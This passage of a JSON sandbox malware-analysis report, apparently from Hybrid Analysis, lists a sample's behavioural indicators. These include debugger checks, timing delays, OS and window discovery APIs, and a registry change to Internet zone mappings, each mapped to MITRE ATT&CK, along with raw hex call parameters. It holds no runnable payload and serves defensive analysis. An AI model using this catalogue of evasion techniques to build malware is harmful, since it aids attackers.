\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"rundll32.exe\" called \"FindResourceA\" with parameter \"128\" - (UID: 00000000-00005204)\n \"rundll32.exe\" called \"FindResourceA\" with parameter \"102\" - (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"4951119267,2092,3024,,RtlGetVersion,NTDLL.dll,\"253:12:29.882\",RX=0,PX=0\" (Indicator: \"GetVersion\"; Source: \"00000000-00000892.00000000.334478.00300000.00000004.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"_.exe\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n file/memory contains long string with (Indicator: \"sendmessage\"; File: \"_.exe\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000892)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100771a00000081e32a7700000000d84a2f00406b2d00606c2d0098c1320008702d0095e16b779cf01200feffffffd4f1120095e16b77810e5700feffffffff2b6f779a2a6f77f8f1120000f3120020f21200340000c06cf11200e7386f77ec386f77fde32a77340000c020f2120000f31200 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec386f7781e32a7724f21200105e6e7758f11200e8f012001c5e6e7764f2120095e16b77e10a5700feffffffec386f7761d60777340000c05d0de37610f312006ed607778c0100004cf2120054f21200ff2b6f7750f212000200000000000000000000008c0100004031330058f11200 (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetActiveWindow\" (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000280633000000000007000007000000005808330098673300780d3300380000000000300000100000280633003cf7120004646f7738013000e0636f7767fc2a77000000000000300000003000e8053300000000004c00004c000000003006330098673300780d3300600200000000300000001000e805330088f7120004646f7738013000e0636f77d3fc2a770000000000003000f00533000000000003000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000003000200633000000000008000008000000005008330098673300780d3300400000000000300000200000200633003cf7120004646f7738013000e0636f7767fc2a77000000000000300000003000e8053300000000004d00004d000000002806330098673300780d3300680200000000300000001000e805330088f7120004646f7738013000e0636f77d3fc2a770000000000003000f005330000000000030000000000000080000000af0100000000000098673300500130000000000000003000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000200633000000000008000008000000005008330098673300780d3300400000000000300000200000200633003cf7120004646f7738013000e0636f7767fc2a7700003000e8053300000000004d00004d000000002806330098673300780d3300680200000000300000001000e805330080f7120004646f7738013000e0636f77dbfc2a770000000000003000f00533004d0000000000000000000000030000000000000080000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000e8053300000000000f00000f000000001808330098773300780d3300780000000000300000001000e80533003cf7120004646f7738013000e0636f7767fc2a770000000000003000f0053300000000000000000000000000000000000000000000000000007d33005001300000000000000030005001300000000000000000005001300003000003000000005d22007f54000000000000000000000003000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000003000e8053300000000000f00000f000000001808330098773300780d3300780000000000300000001000e80533003cf7120004646f7738013000e0636f7767fc2a770000000000003000f0053300000000000000000000000000000000000000000000000000007d33005001300000000000000030005001300000000000000000005001300003000003000000005d22007f5400000000000000000000000300000000000000800000007f070000000000005d22007f5400000000000000007d3300 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000065786500000000000000e02130001cf9120000000000c0f91200ebdb387700000377a0000000d0f91200dfc76f7740837777bec76f778bf22a77ebdb3877a0000000000003770000000000000000000000009cf91200000000007cfd120095e16b778b0d5700feffffffbec76f77548e897500000377ffffffff08e04000a84e400000000377a8e340000900000000000000ffffffff0000000000000377a00000002565097728010000000000007c030000000000000000000003000000f80c00000800000000000000356432383033616534646535373166346366376234316262 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000e8053300000000000f00000f000000001808330098773300780d3300780000000000300000001000e8053300a8fa120004646f7738013000e0636f77f3f12a770000000000003000f005330000000000000000000000000000000000000000000000000000813300500130000000000000003000500130000000000000000000500130000300000300000000dd2100fc5400000000000000000000000300000000000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000e8053300000000000f00000f0000000018083300d8773300780d3300780000000000300000001000e8053300a8fa120004646f7738013000e0636f77f3f12a7700000000000030000000300090773300000000002700002700000000d8773300f0053300780d330038010000000030000080000090773300f4fa120004646f7738013000e0636f77aff12a77000000000000300098773300000000000300000000000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000050013000000000000000000098773300f0053300010112002f0000000000000096000001000000007801000001000101d0e3120000000000a0e5120095e16b7753195700feffffffe0636f7716646f770000000098773300ac00000004e512000000000090773300e4e412005c556f77000030000000000098773300f4e412003c5e6e778dc58975ac00000008e5120010e512000800000004000000f8e5120000000000080000000700000000000000ac000000f8e5120064e5120044a3397703000000ac000000f8e5120000000000000000000c0000000000000001000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006f7700000000000000000000000020b03200c0750f7720b0320000000000c0750f77b8fa120079da0777c0750f770200000010fb120072dc07770000000079dc0777bcc24a6585fc12006cfb1200ffffffff00000000000000000000000000000000c715e3760000000020b032001a000000c8fa12000000000078fd1200c2a20d772ce55f12feffffff79dc07775edb07772c0000003cdf4000000000003f000f005cfb120000000000aedb3877cf444000020000803cdf40006cfb1200d04340007cdf40006cfb120078fd120058a6400000000000ee684000a8e3400009000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003000000000000000000098773300f0053300010112002f0000000000000096000001000000007801000001000101f4e4120000000000c4e6120095e16b7753195700feffffffe0636f7716646f770000000098773300a800000028e61200000000009077330008e612005c556f7700003000000000009877330018e612003c5e6e778dc58975a80000002ce6120034e6120008000000040000001ce7120000000000080000000700000000000000a80000001ce7120088e6120044a3397703000000a80000001ce7120000000000000000000c000000000000000100000000000000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330028833300238333000000000000000000000030000000000134dc12000000000098e9120095e16b7773195700feffffff435c6f7750596f77aa000000b80000002283330020833300bcdd1200f4e1120000000000000000000000000000000000000000000000000000000000000000001c5c6e7760d88975ffffffff170000006cdd120024000000030000005ce2120088e71200f4e112008600000098dd120096ed6f774a833300a06a457586000000bcdd1200f4e112000000000086008800a06a4575bcdd1200916c45754a833300a06a4575a06a45752ce2120002020000 (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000892)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf21200000000003c0000002cf31200feffffffb4f21200cf007077d600707725e02a773c0000001e0000002cf312000000000088f2120000000000f0f21200 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002d00d8d332002000000028f012003b0012000600000004f012001c566f77d8d3320060d3320001000000d0d33200e8ef120000296f77bcf0120030f0120000000000d0d33200fcef12005c556f7700002d0000000000d8d332000cf0120067556f770000000080f012004bde07770000000053de077794c5486400000000000000001cf312000800090040195a760000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a77340000c020f2120000f3120044f1120000000000e0f1120095e16b77e10a5700feffffffec386f773dd107776dd10777e4c448641c175a76000000000000000020000000f8f1120020f212000000000000002d0098c1320098c13200180000000b00c50018040000180000008801000020f2120090bb3200060000000cf212000000000000000000000000006cf21200000000006cf21200148e0677000000001c8e067778c748640000000001000000e02a33000200000058f21200000000000000000079dc07774cc748640000000001000000e02a33000000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002d00d8d332002000000028f012003b0012000a00000004f012001c566f77d8d3320060d3320001000000d0d33200e8ef120000296f77bcf0120030f0120000000000d0d33200fcef12005c556f7700002d0000000000d8d332000cf0120067556f770000000080f012004bde07770000000053de077794c5486401000000000000001cf312000800090040195a760000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002d00d8d332002000000028f012003b0012001200000004f012001c566f77d8d3320060d3320001000000d0d33200e8ef120000296f77bcf0120030f0120000000000d0d33200fcef12005c556f7700002d0000000000d8d332000cf0120067556f770000000080f012004bde07770000000053de077794c5486403000000000000001cf312000800090040195a760000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002d00d8d332002000000028f012003b0012001600000004f012001c566f77d8d3320060d3320001000000d0d33200e8ef120000296f77bcf0120030f0120000000000d0d33200fcef12005c556f7700002d0000000000d8d332000cf0120067556f770000000080f012004bde07770000000053de077794c5486404000000000000001cf312000800090040195a760000000000000000 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002d00d8d332002000000028f012003b0012001e00000004f012001c566f77d8d3320060d3320001000000d0d33200e8ef120000296f77bcf0120030f0120000000000d0d33200fcef12005c556f7700002d0000000000d8d332000cf0120067556f770000000080f012004bde07770000000053de077794c5486407000000000000001cf312000800090040195a760000000000000000 (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"IsWow64Process\" with parameter \"892\" - (UID: 00000000-00000892)\n \"rundll32.exe\" called \"IsWow64Process\" with parameter \"5204\" - (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "GetVersionExA@KERNEL32.dll at 13525-100-00404650\n GetVersionExA@KERNEL32.DLL at 00000000-00000892-16261-29-00404650", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00000892)\n \"rundll32.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: 